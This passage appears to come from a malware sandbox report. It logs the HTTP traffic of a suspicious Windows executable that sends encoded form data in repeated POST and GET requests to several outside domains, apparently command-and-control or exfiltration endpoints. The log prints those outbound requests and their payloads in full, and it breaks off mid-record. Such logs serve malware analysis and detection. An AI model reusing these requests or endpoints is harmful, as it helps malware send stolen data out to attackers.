Oct 15, 2024 16:19:37.767052889 CEST	1830	OUT	POST /slxf/ HTTP/1.1 Host: www.personal-loans-jp8.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.personal-loans-jp8.xyz Content-Length: 1244 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.personal-loans-jp8.xyz/slxf/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 4b 32 39 3d 42 5a 66 6c 2f 48 68 30 37 6c 4e 4c 51 71 33 67 54 50 76 59 78 75 2f 44 47 36 78 70 62 34 6e 43 50 43 68 44 4d 47 53 2f 78 59 51 45 30 4d 37 41 42 78 44 73 4f 69 6b 6d 6c 66 6c 67 78 48 43 71 6c 61 55 65 35 73 51 45 31 36 2f 51 2f 43 79 39 54 78 52 32 66 67 59 7a 6c 35 74 54 63 79 2b 70 38 79 4e 63 58 2b 63 46 50 4e 55 49 42 4f 52 6e 6d 30 67 62 4e 47 34 65 6f 48 56 52 78 59 72 72 51 6a 4b 68 71 44 57 65 57 46 41 30 55 41 48 37 62 6f 41 77 52 45 70 36 38 44 42 42 57 6f 76 43 36 51 50 63 58 48 4b 76 43 4b 5a 74 5a 46 6c 34 6a 4d 6f 39 7a 50 50 69 2b 57 6f 7a 35 74 79 48 67 53 42 4a 6b 58 64 47 38 2f 34 58 34 45 4a 4c 50 35 6e 36 69 6a 47 71 36 31 61 4a 4b 73 43 38 6f 43 51 77 2b 33 56 59 49 54 2f 69 31 6c 41 37 67 6a 4b 78 50 74 67 4b 52 54 61 4d 2f 53 66 75 4e 34 75 77 65 32 79 43 78 51 68 6d 69 4d 30 2f 7a 7a 5a 76 51 62 78 66 6f 6d 64 62 6b 52 36 6e 76 55 59 62 73 71 32 43 4a 78 48 66 67 56 6d 67 37 6a 6e 53 4a 6e 2b 38 47 39 4a 53 42 58 46 57 53 32 65 62 41 45 33 53 78 6d 67 63 63 56 [TRUNCATED] Data Ascii: K29=BZfl/Hh07lNLQq3gTPvYxu/DG6xpb4nCPChDMGS/xYQE0M7ABxDsOikmlflgxHCqlaUe5sQE16/Q/Cy9TxR2fgYzl5tTcy+p8yNcX+cFPNUIBORnm0gbNG4eoHVRxYrrQjKhqDWeWFA0UAH7boAwREp68DBBWovC6QPcXHKvCKZtZFl4jMo9zPPi+Woz5tyHgSBJkXdG8/4X4EJLP5n6ijGq61aJKsC8oCQw+3VYIT/i1lA7gjKxPtgKRTaM/SfuN4uwe2yCxQhmiM0/zzZvQbxfomdbkR6nvUYbsq2CJxHfgVmg7jnSJn+8G9JSBXFWS2ebAE3SxmgccVJQDUYBWXXw92rdpVQOY1NoRFuVuUTV2dHMHmp1sbMXY0qR488Rc5fA+OtM/VJw6kNoz59qNpittYo5o9ltIF/sLr260MmudaPhrnMrCfOMU9ima09AnlFxYLsbgIcOUAuTKCLDd72U5ylC2u3JQjZXgFLtk7SUsn8wtrINeo3xrh4rB8Gekxmx4DrWZ4QusfAOBfS+UYA519kV5KkYzPzvjT9Y945QiGRETNPvbKrWfst+zOxKLHJxm/Cm3d/u4JUwSgx7OlA3Dom3SOkHdWtfw3wV0BcBLSpKn4296wgEnBiVueiWog+LA1vMsV+DZ4C627GFj7gatiyDHNJs4slJgHiI4Ew2lFK3cufvMdlemySVtB+qbD5Ubaq1PHv+c/NyCRLXZ/vC61oQCH4b1UnYGGl2hI93PM45emb7OnLgZ1+JsAx64lsNDILhHR/p4ow3DpbC34UpybeFGfjx20OllyZKOkEBJ58vrNnsSA4DdZazfhuYYoI4GZYDMBiKpjnCDvV73juhlG6Ka2kwIz4Su8HD52pOdhcDtXV7hHcOV6+sDsC9wPmJqUmAFnW6yy6Z1UYcUOmrOhR89Ent7fXalC5sYcQJdXWhkUlmDaqkb9w57v6Lw9wGMZJpdMUblTB9M78TolZ7bRWtxKRe+40ui4kjFLupbSVW [TRUNCATED]
Oct 15, 2024 16:19:38.388431072 CEST	1236	IN	HTTP/1.1 200 OK date: Tue, 15 Oct 2024 14:19:37 GMT content-type: text/html; charset=utf-8 content-length: 1158 x-request-id: 0ce080e0-ba85-4513-9c3c-0864c414d6b4 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_MYkN7ATu9Syv+v73YZHp1vatytPR/rlkXlgN5w1iC7ghMIk+2fSwLn5wbQIci6y4KTGaXfK/XhNO0q50eRuNXA== set-cookie: parking_session=0ce080e0-ba85-4513-9c3c-0864c414d6b4; expires=Tue, 15 Oct 2024 14:34:38 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4d 59 6b 4e 37 41 54 75 39 53 79 76 2b 76 37 33 59 5a 48 70 31 76 61 74 79 74 50 52 2f 72 6c 6b 58 6c 67 4e 35 77 31 69 43 37 67 68 4d 49 6b 2b 32 66 53 77 4c 6e 35 77 62 51 49 63 69 36 79 34 4b 54 47 61 58 66 4b 2f 58 68 4e 4f 30 71 35 30 65 52 75 4e 58 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_MYkN7ATu9Syv+v73YZHp1vatytPR/rlkXlgN5w1iC7ghMIk+2fSwLn5wbQIci6y4KTGaXfK/XhNO0q50eRuNXA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Oct 15, 2024 16:19:38.388487101 CEST	611	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMGNlMDgwZTAtYmE4NS00NTEzLTljM2MtMDg2NGM0MTRkNmI0IiwicGFnZV90aW1lIjoxNzI5MDAxOT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	53114	199.59.243.227	80	3840	C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe

Timestamp	Bytes transferred	Direction	Data
Oct 15, 2024 16:19:40.306252003 CEST	519	OUT	GET /slxf/?K29=Mb3F8yBS6AlbUJPyZs3X69r2DqN8IvT5IyZZHGmk1vQlgc6dIBTXJS0PrtljhQmz1YN0gN0Ls4vblXiCECQJDAoigJx9f3iNuz4aYv9eSvskP5VpnyhZJ0QOlFlswaL7d1KBmz8=&ahL=jjndrjuPIn2hz HTTP/1.1 Host: www.personal-loans-jp8.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18
Oct 15, 2024 16:19:40.922283888 CEST	1236	IN	HTTP/1.1 200 OK date: Tue, 15 Oct 2024 14:19:40 GMT content-type: text/html; charset=utf-8 content-length: 1526 x-request-id: 0de6f1d6-6afb-4652-bb4f-57c5a5d78419 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_SpTxWII4XglTllJXyIwHER5hDxYK+fCHMouTgiVY1k1NpN2UU2JuAjYmm2HMuluaP7ab7EAle9X3JjfT5IuD8Q== set-cookie: parking_session=0de6f1d6-6afb-4652-bb4f-57c5a5d78419; expires=Tue, 15 Oct 2024 14:34:40 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 53 70 54 78 57 49 49 34 58 67 6c 54 6c 6c 4a 58 79 49 77 48 45 52 35 68 44 78 59 4b 2b 66 43 48 4d 6f 75 54 67 69 56 59 31 6b 31 4e 70 4e 32 55 55 32 4a 75 41 6a 59 6d 6d 32 48 4d 75 6c 75 61 50 37 61 62 37 45 41 6c 65 39 58 33 4a 6a 66 54 35 49 75 44 38 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_SpTxWII4XglTllJXyIwHER5hDxYK+fCHMouTgiVY1k1NpN2UU2JuAjYmm2HMuluaP7ab7EAle9X3JjfT5IuD8Q==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Oct 15, 2024 16:19:40.922312021 CEST	979	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMGRlNmYxZDYtNmFmYi00NjUyLWJiNGYtNTdjNWE1ZDc4NDE5IiwicGFnZV90aW1lIjoxNzI5MDAxOT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	53117	119.28.49.194	80	3840	C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe

Timestamp	Bytes transferred	Direction	Data
Oct 15, 2024 16:19:55.367871046 CEST	781	OUT	POST /tma8/ HTTP/1.1 Host: www.cs0724sd92jj.cloud Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.cs0724sd92jj.cloud Content-Length: 208 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.cs0724sd92jj.cloud/tma8/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 4b 32 39 3d 77 4a 76 66 75 51 68 6d 62 35 65 63 75 4e 7a 65 56 48 52 4d 70 39 4e 6d 49 6d 74 31 59 48 55 73 56 6d 41 35 2f 79 53 52 79 58 76 37 77 36 41 51 51 41 58 61 4b 33 64 76 74 78 57 74 6f 63 6d 6e 74 35 4e 47 32 44 4c 54 2b 6f 58 70 6e 42 49 52 44 54 73 54 6c 35 38 63 31 42 54 49 43 74 33 47 34 68 59 6f 34 76 32 47 41 76 43 32 34 4a 4d 66 4e 6b 4a 6d 46 50 39 4b 32 35 33 6c 4d 74 46 6c 46 39 42 46 77 79 78 54 72 6c 67 66 4d 61 79 4a 36 44 73 39 36 30 70 61 4a 56 4b 68 61 56 4c 6f 36 76 33 48 32 2f 41 54 6b 5a 56 49 70 74 7a 33 4a 6a 63 30 37 65 47 57 76 48 61 63 47 72 36 2f 52 5a 30 78 77 63 36 56 51 74 75 56 Data Ascii: K29=wJvfuQhmb5ecuNzeVHRMp9NmImt1YHUsVmA5/ySRyXv7w6AQQAXaK3dvtxWtocmnt5NG2DLT+oXpnBIRDTsTl58c1BTICt3G4hYo4v2GAvC24JMfNkJmFP9K253lMtFlF9BFwyxTrlgfMayJ6Ds960paJVKhaVLo6v3H2/ATkZVIptz3Jjc07eGWvHacGr6/RZ0xwc6VQtuV

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	53118	119.28.49.194	80	3840	C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe

Timestamp	Bytes transferred	Direction	Data
Oct 15, 2024 16:19:58.116660118 CEST	805	OUT	POST /tma8/ HTTP/1.1 Host: www.cs0724sd92jj.cloud Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.cs0724sd92jj.cloud Content-Length: 232 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.cs0724sd92jj.cloud/tma8/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 4b 32 39 3d 77 4a 76 66 75 51 68 6d 62 35 65 63 75 74 6a 65 61 47 52 4d 67 39 4e 6c 48 47 74 31 52 6e 55 6f 56 6d 4d 35 2f 77 2b 42 79 45 62 37 77 65 45 51 52 42 58 61 4e 33 64 76 6c 52 57 73 6e 38 6d 53 74 34 77 35 32 42 50 54 2b 6f 72 70 6e 41 34 52 44 41 45 51 6b 70 39 36 38 68 54 4f 66 64 33 47 34 68 59 6f 34 76 4b 34 41 73 79 32 35 35 63 66 4e 46 4a 6c 4d 76 39 4a 68 4a 33 6c 49 74 46 66 46 39 42 7a 77 32 78 31 72 6e 49 66 4d 65 36 4a 36 58 77 2b 7a 30 70 63 48 31 4c 45 54 57 36 55 36 64 6d 33 34 4a 51 77 37 4a 74 41 6f 62 79 74 56 51 63 58 70 4f 6d 55 76 46 43 75 47 4c 36 56 54 5a 4d 78 69 4c 32 79 66 5a 4c 32 57 70 68 2f 44 65 47 34 71 73 43 77 54 4c 39 31 39 76 51 78 36 41 3d 3d Data Ascii: K29=wJvfuQhmb5ecutjeaGRMg9NlHGt1RnUoVmM5/w+ByEb7weEQRBXaN3dvlRWsn8mSt4w52BPT+orpnA4RDAEQkp968hTOfd3G4hYo4vK4Asy255cfNFJlMv9JhJ3lItFfF9Bzw2x1rnIfMe6J6Xw+z0pcH1LETW6U6dm34JQw7JtAobytVQcXpOmUvFCuGL6VTZMxiL2yfZL2Wph/DeG4qsCwTL919vQx6A==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	53119	119.28.49.194	80	3840	C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe

Timestamp	Bytes transferred	Direction	Data
Oct 15, 2024 16:20:00.668040991 CEST	1818	OUT	POST /tma8/ HTTP/1.1 Host: www.cs0724sd92jj.cloud Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.cs0724sd92jj.cloud Content-Length: 1244 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.cs0724sd92jj.cloud/tma8/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 4b 32 39 3d 77 4a 76 66 75 51 68 6d 62 35 65 63 75 74 6a 65 61 47 52 4d 67 39 4e 6c 48 47 74 31 52 6e 55 6f 56 6d 4d 35 2f 77 2b 42 79 45 44 37 77 74 4d 51 52 69 2f 61 4d 33 64 76 76 78 57 70 6e 38 6d 31 74 35 5a 77 32 42 53 6f 2b 75 76 70 6d 6a 67 52 58 68 45 51 74 70 39 36 2b 68 54 50 43 74 32 45 34 68 49 73 34 76 36 34 41 73 79 32 35 2f 77 66 4c 55 4a 6c 4b 76 39 4b 32 35 32 33 4d 74 45 52 46 39 35 4e 77 32 30 4f 6f 58 6f 66 43 66 47 4a 37 6b 59 2b 79 55 70 65 45 31 4c 6d 54 57 32 78 36 64 37 47 34 4a 4d 57 37 4f 64 41 6c 4e 53 37 45 52 63 65 32 4d 2b 43 34 69 48 4b 4e 39 47 62 53 70 6f 72 79 59 53 6d 41 5a 62 64 54 4d 70 44 44 59 54 47 76 4e 4b 70 55 64 51 67 39 65 38 30 75 6c 48 4a 41 64 46 69 71 61 64 71 39 72 50 57 6a 6a 33 71 4b 47 70 55 62 6b 42 5a 36 6a 5a 44 6c 6c 33 6a 78 30 72 58 48 6a 71 73 62 6a 33 44 48 70 30 64 32 39 52 4c 48 2f 4c 54 56 6b 54 7a 47 33 6a 64 6e 69 4a 66 49 6e 47 4a 32 52 7a 66 44 6f 51 6b 4f 7a 4b 74 53 4e 63 38 38 39 47 30 61 32 68 69 43 34 66 70 32 35 75 4a 2b 73 [TRUNCATED] Data Ascii: K29=wJvfuQhmb5ecutjeaGRMg9NlHGt1RnUoVmM5/w+ByED7wtMQRi/aM3dvvxWpn8m1t5Zw2BSo+uvpmjgRXhEQtp96+hTPCt2E4hIs4v64Asy25/wfLUJlKv9K2523MtERF95Nw20OoXofCfGJ7kY+yUpeE1LmTW2x6d7G4JMW7OdAlNS7ERce2M+C4iHKN9GbSporyYSmAZbdTMpDDYTGvNKpUdQg9e80ulHJAdFiqadq9rPWjj3qKGpUbkBZ6jZDll3jx0rXHjqsbj3DHp0d29RLH/LTVkTzG3jdniJfInGJ2RzfDoQkOzKtSNc889G0a2hiC4fp25uJ+st+UmSR8ldsLPfPPPrtige7qCoSGM8mfh4uu91G/6RLt7q/pBSU7O6n7E6q51qeKSs4Un6wZ553kj8qX2S4rra8Y29gGQEc3bcd8Advn3zsppTTXqqMO5aS+Q1ee7WyksLLj6VeHKln3D1G2ypR3fqBc2CZsDPzcYDKlOCuUCkIk8XAH3Rz5Ne1MrbfNiU0YERM3G7UgxcUsZW9/5jf9V1SdEHgDrCvf9SBv7U9Q5LYBljliZTRSsoFspmKcg6HQYKdY79S52AXwsT+/7PqxN4APrRR4tz8KUwb2xFx14Odhewm1reCDpq+IcOcoQgVb6qRj0xi8x2/xWrJ2losuBIKsPq4GlyQ9rbAIUyaNiLphjopFQSfcYkL+NSUxnWA5om9Buzn4yBo18H/DWtPgC+NwuBA1gcwWzErypqsOGbD2TTj1qVKPWFrjjuyQwM8GPsgILvi9yQbXH67jHAWh8vTvn0wiXk6RknQFGRBmkSP8L4qGl1hF2K0VeddjT1mkbrlDNXp32/XjpdlbavlPYIr/CKUL4wCXSy/bQAJYb4ZcpfL+WgKt96gBlOpoTF+pEnA02HbRpMsUHU2MaxepWTH9Sg/f9oJXk5IXb/4nNedjm3g02xfe4ar+7gya7+kvqTh3WQT9Qlokl12dBCHJVFlbWZP2ZwVVjLh [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	53120	119.28.49.194	80	3840	C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe

Timestamp	Bytes transferred	Direction	Data
Oct 15, 2024 16:20:03.213372946 CEST	515	OUT	GET /tma8/?K29=9LH/tkN2eceTuuLmYHB7mIhvDU5vHmoPFh9uxAKiqHzTpqc2ajrPE0tAvnDw6NiQ6KU66B+DrNfb3y4zDSs+nNVd6Tj8SZ2+7RNw1/qCD+LV8ZMsKDJeBrRvlbyALL5zLd15wyU=&ahL=jjndrjuPIn2hz HTTP/1.1 Host: www.cs0724sd92jj.cloud Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	53122	96.126.123.244	80	3840	C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe

Timestamp	Bytes transferred	Direction	Data
Oct 15, 2024 16:20:17.044009924 CEST	793	OUT	POST /wouj/ HTTP/1.1 Host: www.clientebradesco.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.clientebradesco.online Content-Length: 208 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.clientebradesco.online/wouj/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 4b 32 39 3d 2f 55 77 68 38 6b 76 46 57 4f 37 52 39 76 7a 42 79 7a 62 46 5a 58 57 59 71 78 4b 59 37 33 7a 46 6a 62 48 48 37 46 4b 67 6c 75 5a 4d 32 46 63 77 31 63 4e 5a 63 2f 30 2f 63 72 6d 37 49 47 71 48 79 47 33 53 35 59 70 57 2f 51 38 58 30 72 4d 4f 6b 66 66 6a 53 54 4a 30 65 2b 4b 54 48 6d 78 74 71 58 34 37 70 6f 67 57 62 6e 63 30 75 4c 49 62 69 45 44 69 34 76 69 6f 52 75 43 47 47 4d 5a 57 68 44 75 6a 59 79 70 63 45 72 52 44 75 78 4b 65 66 2f 6e 35 49 30 44 37 46 4e 2f 47 75 39 39 63 69 72 76 4f 50 4e 41 69 6c 77 66 7a 2b 4b 39 67 6e 69 63 6c 57 79 58 7a 61 43 45 37 56 69 35 4b 37 68 67 4b 74 31 34 64 55 53 48 2f Data Ascii: K29=/Uwh8kvFWO7R9vzByzbFZXWYqxKY73zFjbHH7FKgluZM2Fcw1cNZc/0/crm7IGqHyG3S5YpW/Q8X0rMOkffjSTJ0e+KTHmxtqX47pogWbnc0uLIbiEDi4vioRuCGGMZWhDujYypcErRDuxKef/n5I0D7FN/Gu99cirvOPNAilwfz+K9gniclWyXzaCE7Vi5K7hgKt14dUSH/
Oct 15, 2024 16:20:17.668026924 CEST	816	IN	HTTP/1.1 200 OK server: openresty/1.13.6.1 date: Tue, 15 Oct 2024 14:20:17 GMT content-type: text/html transfer-encoding: chunked content-encoding: gzip connection: close Data Raw: 32 37 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 54 db 72 9b 30 10 7d cf 57 50 1e 32 ed 4c cc cd 76 1c 37 28 9d c4 4d 7c 19 62 37 9e c4 36 7e c9 08 49 31 22 42 22 20 c0 4c a7 ff 5e 2e 99 98 8e db 87 ea 01 69 97 3d 67 77 cf 82 ec 4f df 17 a3 47 f7 c7 ad e2 cb 90 5d 9d d8 d5 a6 30 c8 77 40 25 5c bd 3a 51 ca 65 fb 04 e2 e6 58 9b 21 91 50 41 3e 8c 13 22 81 fa f4 78 d7 b9 78 8f 3c bc f6 a5 8c 3a e4 2d a5 19 50 f7 9d 14 76 90 08 23 28 a9 c7 88 aa 20 c1 25 e1 25 76 7a 0b 08 de 91 23 34 87 21 01 6a 46 49 1e 89 58 b6 00 39 c5 d2 07 98 64 14 91 4e 6d 9c 29 94 53 49 21 eb 24 08 32 02 4c cd 68 d3 49 2a 19 b9 b2 f5 66 af db a9 8b e4 22 41 31 8d e4 a1 ad bf d7 1e 93 97 98 24 7e ab 04 e3 32 8d 19 a8 fa fb aa eb 79 9e 0f 0c 0d 31 5a b6 43 bc 18 62 92 20 a1 09 ce 28 27 ba aa e8 07 7a 5b 3f 4e 69 d7 4a b6 a5 3a 4e d7 ff ff 74 b6 7e 18 98 ed 09 5c 28 65 41 02 62 a0 62 f1 dc 1c 3f 7f 69 8b d4 48 a1 c8 22 2a 55 97 64 2f f5 00 66 b0 f1 b6 e2 2a 85 5e 52 8e 24 15 5c 69 51 29 3f 3f 74 ad 42 aa 95 53 8e 45 ae 49 11 69 4c a0 [TRUNCATED] Data Ascii: 270Tr0}WP2Lv7(M\|b76~I1"B" L^.i=gwOG]0w@%\:QeX!PA>"xx<:-Pv#( %%vz#4!jFIX9dNm)SI!$2LhIf"A1$~2y1ZCb ('z[?NiJ:Nt~\(eAbb?iH"Ud/f*^R$\iQ)??tBSEIiLrk~ E\|E<s`2fp0[B$~.(\|zM.ZPgtMbz>Mkp1D+L2_wq\R<^Qn7+#/\|54!hx`1MC'K><sYaws{ceYdz}g0t[oN!`w,pW=}/lunpAilKz7^)0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	53123	96.126.123.244	80	3840	C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe

Timestamp	Bytes transferred	Direction	Data
Oct 15, 2024 16:20:19.590712070 CEST	817	OUT	POST /wouj/ HTTP/1.1 Host: www.clientebradesco.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.clientebradesco.online Content-Length: 232 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.clientebradesco.online/wouj/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 4b 32 39 3d 2f 55 77 68 38 6b 76 46 57 4f 37 52 73 38 72 42 77 51 44 46 65 33 57 62 32 68 4b 59 69 6e 7a 42 6a 62 44 48 37 45 4f 77 6d 64 74 4d 32 6e 45 77 30 64 4e 5a 66 2f 30 2f 55 4c 6d 2b 58 57 71 79 79 47 37 77 35 63 70 57 2f 54 41 58 30 71 38 4f 6b 6f 72 67 54 44 4a 79 47 4f 4b 64 49 47 78 74 71 58 34 37 70 70 52 78 62 6d 